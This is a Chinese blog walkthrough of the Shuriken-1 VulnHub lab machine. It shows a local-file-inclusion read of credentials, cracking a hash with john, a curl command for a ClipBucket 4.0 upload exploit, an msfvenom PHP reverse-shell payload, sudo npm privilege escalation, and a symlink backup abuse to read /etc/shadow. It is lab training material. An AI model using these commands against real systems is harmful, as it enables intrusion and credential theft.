Shuriken-1靶机总结

已于 2023-01-09 16:53:54 修改
阅读量309 收藏 1
点赞数
分类专栏: 靶机测试 文章标签: php 服务器 开发语言
于 2022-12-17 22:01:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45301512/article/details/128357775
版权

Shuriken-1靶机渗透总结

靶机下载地址:
https://download.vulnhub.com/shuriken/Shuriken-1.ova

  1. 将Shuriken-1虚拟机设为NAT模式后,打开虚拟机,通过nmap扫描出其ip和端口
    在这里插入图片描述

  2. 通过开放的80端口,打开网站
    在这里插入图片描述

  3. 信息收集,发现js文件存在两个链接
    在这里插入图片描述
    在这里插入图片描述

  4. 尝试去打开链接,发现了一个存在文件包含的地方
    在这里插入图片描述
    Broadcas.shuriken.local无法直接打开,需要加到hosts文件中
    在这里插入图片描述
    打开网站后发现需要登录
    在这里插入图片描述

  5. 尝试通过文件包含读取apache2的配置文件,发现了存放密码的路径,紧接着去读取密码

    /etc/apache2/sites-enabled/000-default.conf

    在这里插入图片描述
    读取到了密码

    developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0

    在这里插入图片描述

  6. 接下来就是对密码的破解,这里利用john工具

    john --wordlist=/usr/share/wordlists/rockyou.txt /home/kali/Desktop/hash
john --show  /home/kali/Desktop/hash

    破解后的密码: 9972761drmfsls
    在这里插入图片描述

    在这里插入图片描述

    并且登录后发现是ClipBucket 4.0
    在这里插入图片描述

  7. 尝试去网上搜寻符合符合的漏洞,在exploit网站找到一个,可以文件上传的exploit
    在这里插入图片描述

    curl --basic --user "developers:9972761drmfsls" -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"  http://broadcast.shuriken.local/actions/beats_uploader.php

    在这里插入图片描述

  8. 准备要上传的文件,这里上传一个msfvenom生成的shell

    msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.11.131 LPORT=12345 -f raw -o  /home/kali/Desktop/shell.php

    在这里插入图片描述
    在这里插入图片描述

  9. 通过上传成功后返回的文件名和后缀加路径,可以找到上传的php文件,并且运行
    http://broadcast.shuriken.local/actions/CB_BEATS_UPLOAD_DIR/
    在这里插入图片描述

  10. 在kali里面利用msf开启监听,成功连接shuriken靶机
    在这里插入图片描述

  11. 当前用户是www-data,考虑提权,经过发现,使用sudo –l 命令
    看到了server-management用户无密码使用npm命令,存在sudo滥用提权
    在这里插入图片描述
    并且在https://gtfobins.github.io/找到了对应的提权命令

    touch package.json
echo '{"scripts":{"dev":"/bin/bash"}}' > package.json
sudo -u server-management npm run dev

    在这里插入图片描述

    成功提权到server-management用户
    在这里插入图片描述

  12. 在server-management用户的家目录下发现了user.txt
    获得了第一个flag
    67528b07b382dfaa490f4dffc57dcdc0
    在这里插入图片描述

  13. 紧接着考虑提权至root的方法
    这里没有找到提权的方法
    但是发现了一个奇怪的进程
    在这里插入图片描述
    经过查看backupsrv.sh内容
    大概理解这个进程的作用是,在/var/backups目录下生成一个tgz文件
    文件名字是时间和主机名字的组合
    并且tgz文件的内容是/home/server-management/Documents目录里面的内容
    在这里插入图片描述

  14. 利用这点,我们可以下载/etc的文件
    观察了一下,该sh大概每分钟会被执行一次,由于sh中参数不能修改,于是这里删除了/home/server-management/Documents文件夹,做了/etc到Documents的软连接,压缩成功后将其拷贝到/var/www/main(注意:需切换到www-data用户),下载后获取到shadow文件
    在这里插入图片描述
    在这里插入图片描述
    cp /var/backups/shuriken-Sunday.tgz /var/www/main
    在这里插入图片描述

  15. 下载之后,对应的tgz文件内容是对应的/etc的文件内容,在里面打开了shadow文件,获取了root的密码,但是这里不会解密
    在这里插入图片描述

    $6$KEYGm0ZQ$oTT3SYXna/5H61MZCwqvY995xtDqHGaMe5LRrMXNtVLLDVwfoj.DtJ0AQk6wfhAfOW23uR6wqd7UC5I7MPq0a0

    在这里插入图片描述

  16. 无法解密,直接同步骤将/root文件下载下来,打开里面的root.txt文件
    获取了第二个flag
    d0f9655a4454ac54e3002265d40b2edd
    在这里插入图片描述

Beilay()
关注
专栏目录
Shuriken: 1 vulnhub walkthrough
xdeclearn的博客
12-03 1210
Shuriken: 1 vulnhub地址:http://www.vulnhub.com/entry/shuriken-1,600/ 0x01 信息收集到获取shell 服务器只开放了80端口,dirb爬取目录。 ==> DIRECTORY: http://192.168.56.121/css/ ==> DIRECTORY: http://192.168.56.121/img/
渗透测试(一)Node渗透
weixin_42484187的博客
11-12 3765
渗透测试(一)Node渗透一、实验环境二、实验过程三、实验步骤信息收集前端代码审计解密数据提权 一、实验环境 攻击机:kali 192.168.150.131 靶机: node(https://www.vulnhub.com/entry/node-1,252/) ip未知 二、实验过程 信息收集:IP、端口 代码审计:访问api 解密数据:获得敏感信息 系统内核漏洞提权 三、实验步骤 信息收集 **扫描网段192.168.150.0/24,**获得目标ip:192.168.150.129 **扫描
最近的靶机练习总结
weixin_44769042的博客
10-09 512
最近做了几个靶机,把其中重要的点总结一下 主机发现 nmap -sn 网段 -sn 是只扫描存活主机而不去扫描端口,就会比较快了 netdiscover -i eth0 -r 网段 这个发的是arp包来探测,而nmap可以自己指定发送什么包 端口扫描 masscan --rate=10000 --ports 0-65535 ip masscan专注端口扫描,比较快 目录扫描 工具都差不多,主要看字典给不给力 dirb http://ip dirb http:/...
SHURIKEN: NODE 靶机渗透测试
weixin_62035484的博客
04-17 897
观察到有 passwd.bak 和 shadow.bak 以及 ssh-backup.zip,但passwd.bak和shadow.bak无法打开,将 ssh-backup.zip 复制到 /tmp 目录中,并发送给kali。保存,然后停止shuriken-auto.timer再执行shuriken-auto.timer,sudoers就可以被直接编辑,这是一个静态的页面,有一个登录的入口,除此之外没别的信息了,其他的网页扫描工具也扫不出来什么东西。192.168.56.x是我的虚拟机所在的网段。
HTB靶场系列 linux靶机 Tartarsause靶机
程序员阿飘 的博客
01-10 226
本文已参与「新人创作礼」活动,一起开启掘金创作之路。
Shuriken-开源
05-01
"Shuriken-开源"是一个专门针对Linux系统的开源工具,其设计目的是为了自动化系统的定时启动和关闭。这个工具的核心功能是利用Linux实时时钟(RTC)来设置每日警报,以便在设定的时间跨度开始之前自动开启系统电源。...
Shuriken Salvo 1.02 - 忍术粒子超强特效包
09-20
Shuriken Salvo 1.02 - 忍术粒子超强特效包》是一款专为数字内容创作和视觉效果设计者打造的专业级粒子特效工具。该软件的核心在于其丰富的忍术粒子系统,允许用户创造出令人惊叹的动态效果,广泛应用于游戏开发、...
Shuriken:1【攻略】
weixin_51494407的博客
10-16 184
Shuriken: 1 Vulnhub地址:http://www.vulnhub.com/entry/shuriken-1,600/
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7943
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
靶机渗透练习90-Grotesque:1.0.1
hirak0的博客
05-02 2934
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
靶机合集-总结
m0_50627257的博客
09-17 944
一、漏洞利用、实战练习平台 1、WebGoat漏洞练习环境 https://github.com/WebGoat/WebGoat https://github.com/WebGoat/WebGoat-Legacy https://github.com/RandomStorm/DVWA 2、DoraBox,多拉盒 - 掌握常见漏洞攻防 https://github.com/gh0stkey/DoraBox 3、一个功能很全的CTF平台 https://github.com/zjlywjh001/PhrackC
Unity中的Shuriken粒子系统(1)
weixin_43332204的博客
06-27 825
unity 3d 的Shuriken粒子系统 1.打开unity 3d,新建一个工程文件,可取名为ShurikenParticleSystemProject。 2.在Project下新建一个文件夹,可取名为Scenes,并将场景进行保存到文件夹中,可保存为main。 3.创建粒子系统的三种方式: 方式一: 方式二: 方式三:由于没有材质,得到的特效是紫色的 4.这里采用了方式一创建粒...
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 3152
Vulnhub靶机渗透学习——DC-9
0.0.0.0 127.0.0.1等几个特殊的IP地址
zhurobert的博客
10-10 533
0.0.0.0 127.0.0.1 255.255.255.255等特殊地址
PHP智慧餐饮新风尚点餐系统
2401_84593753的博客
10-10 606
总的来说,智慧餐饮新风尚点餐系统不仅为顾客带来了便捷、高效、个性化的点餐体验,也为餐厅提供了有力的运营支持。它让美食与科技实现了完美结合,让我们在享受美食的同时,也能感受到科技的魅力。如果你还没有尝试过这款点餐系统,不妨找个机会去体验一下,相信它会给你带来不一样的惊喜!
信息收集2
最新发布
Taurus_HanKun的博客
10-16 521
这个文件是为了网络搜索引擎爬虫程序准备的目的就是为了让爬虫文件爬取网站的信息,便于搜索引擎收录网站,存在的风险就是这个目录记录的是网站的目录结构。一直在网站的域名后面添加字符串,如果返回结果是404,表示页面不存在,如果是其他结果的值,说明这个页面是存在的。检查网站的一些小图片,将这些图片的MD5值,和特定的cms中的图片MD5做比对,一样则说明用的是同一个cms。从不同的位置去ping,如果返回的IP地址是相同的,代表没有使用cdn,如不同则代表使用了cdn。
shuriken salvo 1.04
07-28
1. 多重投射:shuriken salvo 1.04可能会一次性射出多个手里剑,从而同时攻击多个敌人。这种特点可以在面对多个敌人时提高玩家的攻击效率。 2. 高伤害:由于shuriken salvo 1.04是一个技能或武器,因此它可能会给...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值